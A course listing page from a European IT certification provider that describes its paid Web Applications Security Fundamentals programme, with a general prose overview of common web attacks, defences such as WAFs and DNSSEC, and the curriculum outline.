×
1 Choose EITC/EITCA Certificates
2 Learn and take online exams
3 Get your IT skills certified

Confirm your IT skills and competencies under the European IT Certification framework from anywhere in the world fully online.

EITCA Academy

Digital skills attestation standard by the European IT Certification Institute aiming to support Digital Society development

LOG IN TO YOUR ACCOUNT BY EITHER YOUR USERNAME OR EMAIL ADDRESS

CREATE AN ACCOUNT FORGOT YOUR PASSWORD?

FORGOT YOUR DETAILS?

AAH, WAIT, I REMEMBER NOW!

CREATE AN ACCOUNT

ALREADY HAVE AN ACCOUNT?
EUROPEAN INFORMATION TECHNOLOGIES CERTIFICATION ACADEMY - ATTESTING YOUR PROFESSIONAL DIGITAL SKILLS
  • SIGN UP
  • LOGIN
  • INFO

EITCA Academy

EITCA Academy

The European Information Technologies Certification Institute - EITCI ASBL

Certification Authority

EITCI Institute

Brussels, European Union

Governing European IT Certification (EITC) standard in support of the IT professionalism and Digital Society

  • CERTIFICATES
    • EITCA ACADEMIES
      • EITCA ACADEMIES CATALOGUE<
      • EITCA/CG COMPUTER GRAPHICS
      • EITCA/IS INFORMATION SECURITY
      • EITCA/BI BUSINESS INFORMATION
      • EITCA/KC KEY COMPETENCIES
      • EITCA/EG E-GOVERNMENT
      • EITCA/WD WEB DEVELOPMENT
      • EITCA/AI ARTIFICIAL INTELLIGENCE
    • EITC CERTIFICATES
      • EITC CERTIFICATES CATALOGUE<
      • COMPUTER GRAPHICS CERTIFICATES
      • WEB DESIGN CERTIFICATES
      • 3D DESIGN CERTIFICATES
      • OFFICE IT CERTIFICATES
      • BITCOIN BLOCKCHAIN CERTIFICATE
      • WORDPRESS CERTIFICATE
      • CLOUD PLATFORM CERTIFICATENEW
    • EITC CERTIFICATES
      • INTERNET CERTIFICATES
      • CRYPTOGRAPHY CERTIFICATES
      • BUSINESS IT CERTIFICATES
      • TELEWORK CERTIFICATES
      • PROGRAMMING CERTIFICATES
      • DIGITAL PORTRAIT CERTIFICATE
      • WEB DEVELOPMENT CERTIFICATES
      • DEEP LEARNING CERTIFICATESNEW
    • CERTIFICATES FOR
      • EU PUBLIC ADMINISTRATION
      • TEACHERS AND EDUCATORS
      • IT SECURITY PROFESSIONALS
      • GRAPHICS DESIGNERS & ARTISTS
      • BUSINESSMEN AND MANAGERS
      • BLOCKCHAIN DEVELOPERS
      • WEB DEVELOPERS
      • CLOUD AI EXPERTSNEW
  • FEATURED
  • SUBSIDY
  • HOW IT WORKS
  •   IT ID
  • ABOUT
  • CONTACT
  • MY ORDER
    Your current order is empty.
EITCIINSTITUTE
CERTIFIED

EITC/IS/WASF Web Applications Security Fundamentals

by admin / Monday, 18 October 2021 / Published in Uncategorized
Current Status
Not Enrolled
Price
€110
Get Started
Enrol for this Certification

EITC/IS/WASF Web Applications Security Fundamentals is the European IT Certification programme on theoretical and practical aspects of World Wide Web services security ranging from security of basic web protocols, through privacy, threats and attacks on different layers of web traffic network communication, web servers security, security in higher layers, including web browsers and web applications, as well as authentication, certificates and phising.

The curriculum of the EITC/IS/WASF Web Applications Security Fundamentals covers introduction to HTML and JavaScript web security aspects, DNS, HTTP, cookies, sessions, cookie and session attacks, Same Origin Policy, Cross-Site Request Forgery, exceptions to the Same Origin Policy, Cross-Site Scripting (XSS), Cross-Site Scripting defenses, web fingerprinting, privacy on the web, DoS, phishing and side channels, Denial-of-Service, phishing and side channels, injection attacks, Code injection, transport layer security (TLS) and attacks, HTTPS in the real world, authentication, WebAuthn, managing web security, security concerns in Node.js project, server security, safe coding practices, local HTTP server security, DNS rebinding attacks, browser attacks, browser architecture, as well as writing secure browser code, within the following structure, encompassing comprehensive video didactic content as a reference for this EITC Certification.

Web application security is a subset of information security that focuses on website, web application, and web service security. Web application security, at its most basic level, is based on application security principles, but it applies them particularly to the internet and web platforms. Web application security technologies, such as Web application firewalls, are specialized tools for working with HTTP traffic.

The Open Web Application Security Project (OWASP) offers resources that are both free and open. A non-profit OWASP Foundation is in charge of it. The 2017 OWASP Top 10 is the outcome of current study based on extensive data gathered from over 40 partner organizations. Approximately 2.3 million vulnerabilities were detected across over 50,000 applications using this data. The top ten most critical online application security concerns, according to the OWASP Top 10 – 2017, are:

  • Injection
  • Authentication issues
  • Exposed sensitive data XML external entities (XXE)
  • Access control that isn’t working
  • Misconfiguration of security
  • Site-to-site scripting (XSS)
  • Deserialization that isn’t secure
  • Using components that have known flaws
  • Logging and monitoring are insufficient.

Hence The practice of defending websites and online services against various security threats that exploit weaknesses in an application’s code is known as web application security. Content management systems (e.g., WordPress), database administration tools (e.g., phpMyAdmin), and SaaS apps are all common targets for online application assaults.

Web applications are considered high-priority targets by the perpetrators because:

  • Because of the intricacy of their source code, unattended vulnerabilities and malicious code modification are more likely.
  • High-value rewards, such as sensitive personal information obtained through effective source code tampering.
  • Ease of execution, because most assaults can be readily automated and deployed indiscriminately against thousands, tens, or even hundreds of thousands of targets at once.
  • Organizations who fail to safeguard their web applications are vulnerable to attack. This can lead to data theft, strained client relationships, cancelled licenses, and legal action, among other things.

Vulnerabilities in websites

Input/output sanitization flaws are common in web applications, and they’re frequently exploited to either change source code or get unauthorized access.

These flaws allow for the exploitation of a variety of attack vectors, including:

  • SQL Injection – When a perpetrator manipulates a backend database with malicious SQL code, information is revealed. Illegal list browsing, table deletion, and unauthorized administrator access are among the consequences.
  • XSS (Cross-site Scripting) is an injection attack that targets users in order to gain access to accounts, activate Trojans, or change page content. When malicious code is injected directly into an application, this is known as stored XSS. When malicious script is mirrored from an application onto a user’s browser, this is known as reflected XSS.
  • Distant File Inclusion – This form of attack allows a hacker to inject a file into a web application server from a remote location. This can lead to dangerous scripts or code being executed within the app, as well as data theft or modification.
  • Cross-site Request Forgery (CSRF) – A type of attack that can result in an unintended transfer of cash, password changes, or data theft. It occurs when a malicious web program instructs a user’s browser to conduct an undesired action on a website to which they are logged in.

In theory, effective input/output sanitization might eradicate all vulnerabilities, rendering an application impervious to unauthorized modification.

However, because most programs are in a perpetual state of development, comprehensive sanitization is rarely a viable option. Furthermore, apps are commonly integrated with one another, resulting in a coded environment that is becoming increasingly complex.

To avoid such dangers, web application security solutions and processes, such as PCI Data Security Standard (PCI DSS) certification, should be implemented.

Firewall for web applications (WAF)

WAFs (web application firewalls) are hardware and software solutions that protect applications from security threats. These solutions are designed to inspect incoming traffic in order to detect and block attack attempts, compensating for any code sanitization flaws.

WAF deployment addresses a crucial criterion for PCI DSS certification by protecting data against theft and modification. All credit and debit cardholder data maintained in a database must be safeguarded, according to Requirement 6.6.

Because it is put ahead of its DMZ at the network’s edge, establishing a WAF usually does not necessitate any changes to an application. It then serves as a gateway for all incoming traffic, filtering out dangerous requests before they can interact with an application.

To assess which traffic is allowed access to an application and which has to be weeded out, WAFs employ a variety of heuristics. They can quickly identify malicious actors and known attack vectors thanks to a regularly updated signature pool.

Almost all WAFs may be tailored to individual use cases and security regulations, as well as combating emerging (also known as zero-day) threats. Finally, to acquire additional insights into incoming visitors, most modern solutions use reputational and behavior data.

In order to build a security perimeter, WAFs are usually combined with additional security solutions. These could include distributed denial-of-service (DDoS) prevention services, which give the extra scalability needed to prevent high-volume attacks.

Checklist for web application security
There are a variety of approaches for safeguarding web apps in addition to WAFs. Any web application security checklist should include the following procedures:

  • Collecting data — Go over the application by hand, looking for entry points and client-side codes. Classify content that is hosted by a third party.
  • Authorization — Look for path traversals, vertical and horizontal access control issues, missing authorization, and insecure, direct object references when testing the application.
  • Secure all data transmissions with cryptography. Has any sensitive information been encrypted? Have you employed any algorithms that aren’t up to snuff? Are there any randomness errors?
  • Denial of service — Test for anti-automation, account lockout, HTTP protocol DoS, and SQL wildcard DoS to improve an application’s resilience against denial of service attacks. This does not include security against high-volume DoS and DDoS attacks, which require a mix of filtering technologies and scalable resources to resist.

For further details, one can check the OWASP Web Application Security Testing Cheat Sheet (it’s also a great resource for other security-related topics).

DDoS protection

DDoS assaults, or distributed denial-of-service attacks, are a typical way to interrupt a web application. There are a number of approaches for mitigating DDoS assaults, including discarding volumetric attack traffic at Content Delivery Networks (CDNs) and employing external networks to appropriately route genuine requests without causing a service interruption.

DNSSEC (Domain Name System Security Extensions) protection

The domain name system, or DNS, is the Internet’s phonebook, and it reflects how an Internet tool, such as a web browser, finds the relevant server. DNS cache poisoning, on-path attacks, and other means of interfering with the DNS lookup lifecycle will be used by bad actors to hijack this DNS request process. If DNS is the Internet’s phone book, DNSSEC is unspoofable caller ID. A DNS lookup request can be protected using the DNSSEC technology.

To acquaint yourself in-detail with the certification curriculum you can expand and analyze the table below.

The EITC/IS/WASF Web Applications Security Fundamentals Certification Curriculum references open-access didactic materials in a video form. Learning process is divided into a step-by-step structure (programmes -> lessons -> topics) covering relevant curriculum parts. Unlimited consultancy with domain experts are also provided.
For details on the Certification procedure check How it Works.

Certification Programme Curriculum

Expand All
Introduction 1 Topic
Expand
Lesson Content
0% Complete 0/1 Steps
Introduction to web security, HTML and JavaScript review
Web protocols 1 Topic
Expand
Lesson Content
0% Complete 0/1 Steps
DNS, HTTP, cookies, sessions
Session attacks 1 Topic
Expand
Lesson Content
0% Complete 0/1 Steps
Cookie and session attacks
Same Origin Policy 2 Topics
Expand
Lesson Content
0% Complete 0/2 Steps
Cross-Site Request Forgery
Exceptions to the Same Origin Policy
Cross-site scripting 2 Topics
Expand
Lesson Content
0% Complete 0/2 Steps
Cross-Site Scripting (XSS)
Cross-Site Scripting defenses
Web fingerprinting 1 Topic
Expand
Lesson Content
0% Complete 0/1 Steps
Fingerprinting and privacy on the web
DoS, phishing and side channels 1 Topic
Expand
Lesson Content
0% Complete 0/1 Steps
Denial-of-service, phishing and side channels
Injection attacks 1 Topic
Expand
Lesson Content
0% Complete 0/1 Steps
Code injection
TLS attacks 1 Topic
Expand
Lesson Content
0% Complete 0/1 Steps
Transport layer security
HTTPS in the real world 1 Topic
Expand
Lesson Content
0% Complete 0/1 Steps
HTTPS in the real world
Authentication 2 Topics
Expand
Lesson Content
0% Complete 0/2 Steps
Introduction to authentication
WebAuthn
Managing web security 1 Topic
Expand
Lesson Content
0% Complete 0/1 Steps
Managing security concerns in Node.js project
Server security 2 Topics
Expand
Lesson Content
0% Complete 0/2 Steps
Server security: safe coding practices
Local HTTP server security
DNS attacks 1 Topic
Expand
Lesson Content
0% Complete 0/1 Steps
DNS rebinding attacks
Browser attacks 1 Topic
Expand
Lesson Content
0% Complete 0/1 Steps
Browser architecture, writing secure code
Practical web applications security 1 Topic
Expand
Lesson Content
0% Complete 0/1 Steps
Securing web applications with modern platform features
EITC/IS/WASF Web Applications Security Fundamentals
  • Tweet

About admin

Home » My Account

Certification Center

Programme Home Expand All
Introduction
1 Topic
Introduction to web security, HTML and JavaScript review
Web protocols
1 Topic
DNS, HTTP, cookies, sessions
Session attacks
1 Topic
Cookie and session attacks
Same Origin Policy
2 Topics
Cross-Site Request Forgery
Exceptions to the Same Origin Policy
Cross-site scripting
2 Topics
Cross-Site Scripting (XSS)
Cross-Site Scripting defenses
Web fingerprinting
1 Topic
Fingerprinting and privacy on the web
DoS, phishing and side channels
1 Topic
Denial-of-service, phishing and side channels
Injection attacks
1 Topic
Code injection
TLS attacks
1 Topic
Transport layer security
HTTPS in the real world
1 Topic
HTTPS in the real world
Authentication
2 Topics
Introduction to authentication
WebAuthn
Managing web security
1 Topic
Managing security concerns in Node.js project
Server security
2 Topics
Server security: safe coding practices
Local HTTP server security
DNS attacks
1 Topic
DNS rebinding attacks
Browser attacks
1 Topic
Browser architecture, writing secure code
Practical web applications security
1 Topic
Securing web applications with modern platform features
EITC/IS/WASF Web Applications Security Fundamentals

USER MENU

  • My Bookings

CERTIFICATE CATEGORY

  • EITC Certification (105)
  • EITCA Certification (9)

What are you looking for?

  • Introduction
  • How it works?
  • EITCA Academies
  • EITCI DSJC Subsidy
  • Full EITC catalogue
  • Your order
  • Featured
  •   IT ID
  • About
  • Contact

Eligibility for EITCA Academy 80% EITCI DSJC Subsidy support

80% of EITCA Academy fees subsidized in enrolment by 8/2/2023

    EITCA Academy Administrative Office

    European IT Certification Institute
    Brussels, Belgium, European Union

    EITC / EITCA Certification Authority
    Governing European IT Certification Standard
    Access contact form or call +32 25887351

    14 hours agoThe #EITC/IS/QCF Quantum Cryptography Fundamentals (part of #EITCA/IS) attests expertise in #QKD, #BB84, #B92 and… https://t.co/YCcJMB537X
    Follow @EITCI

    Automatically translate to your language

    Terms and Conditions | Privacy Policy
    Follow @EITCI
    EITCA Academy
    • EITCA Academy on social media
    EITCA Academy


    © 2008-2023  European IT Certification Institute
    Brussels, Belgium, European Union

    TOP
    Chat with Support
    Chat with Support
    Questions, doubts, issues? We are here to help you!
    End chat
    Connecting...
    Do you have a question? Ask us!
    Do you have a question? Ask us!
    :
    :
    :
    Send
    Do you have a question? Ask us!
    :
    :
    Start Chat
    The chat session has ended. Thank you!
    Please rate the support you've received.
    Good Bad